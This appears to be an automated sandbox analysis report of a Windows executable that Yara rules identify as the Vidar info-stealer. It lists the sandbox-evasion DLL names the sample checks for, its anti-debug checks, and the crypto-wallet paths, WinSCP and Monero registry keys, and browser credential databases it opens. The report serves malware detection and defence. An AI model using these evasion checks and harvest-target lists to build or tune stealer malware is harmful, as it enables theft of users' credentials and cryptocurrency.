                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: gVKsiQIHqe.exeStatic PE information: section name: .00cfg

                  Boot Survival

                  barindex
                  Monitors registry run keys for changes
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: gVKsiQIHqe.exeBinary or memory string: DIR_WATCH.DLL
                  Source: gVKsiQIHqe.exeBinary or memory string: SBIEDLL.DLL
                  Source: gVKsiQIHqe.exeBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: gVKsiQIHqe.exeBinary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeEvaded block: after key decisiongraph_0-14793
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-12848
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00410BA0 GetSystemInfo,wsprintfA,0_2_00410BA0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000083E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW``
                  Source: Web Data.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Web Data.8.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: Web Data.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: Web Data.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Web Data.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: Web Data.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: Web Data.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: Web Data.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Web Data.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: Web Data.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: Web Data.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Web Data.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: Web Data.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Web Data.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: Web Data.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: Web Data.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: Web Data.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: Web Data.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeAPI call chain: ExitProcess graph end nodegraph_0-12444
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeAPI call chain: ExitProcess graph end nodegraph_0-13070
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeAPI call chain: ExitProcess graph end nodegraph_0-12446
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401170 mov eax, dword ptr fs:[00000030h]0_2_00401170
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401190 test dword ptr fs:[00000030h], 00000068h0_2_00401190
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004011B0 mov eax, dword ptr fs:[00000030h]0_2_004011B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004108E0 GetProcessHeap,HeapAlloc,GetComputerNameA,0_2_004108E0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00411FA0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411FA0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00411ED0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00411ED0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_004109F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041D850 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041D850
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004108B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00410990 HeapAlloc,GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00410990
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: gVKsiQIHqe.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3275591454.0000000000189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: window-state.json
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: exodus.conf.json
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: info.seco
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: passphrase.json
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3275591454.0000000000189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3275591454.0000000000189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: nomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: MultiDoge
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: seed.seco
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
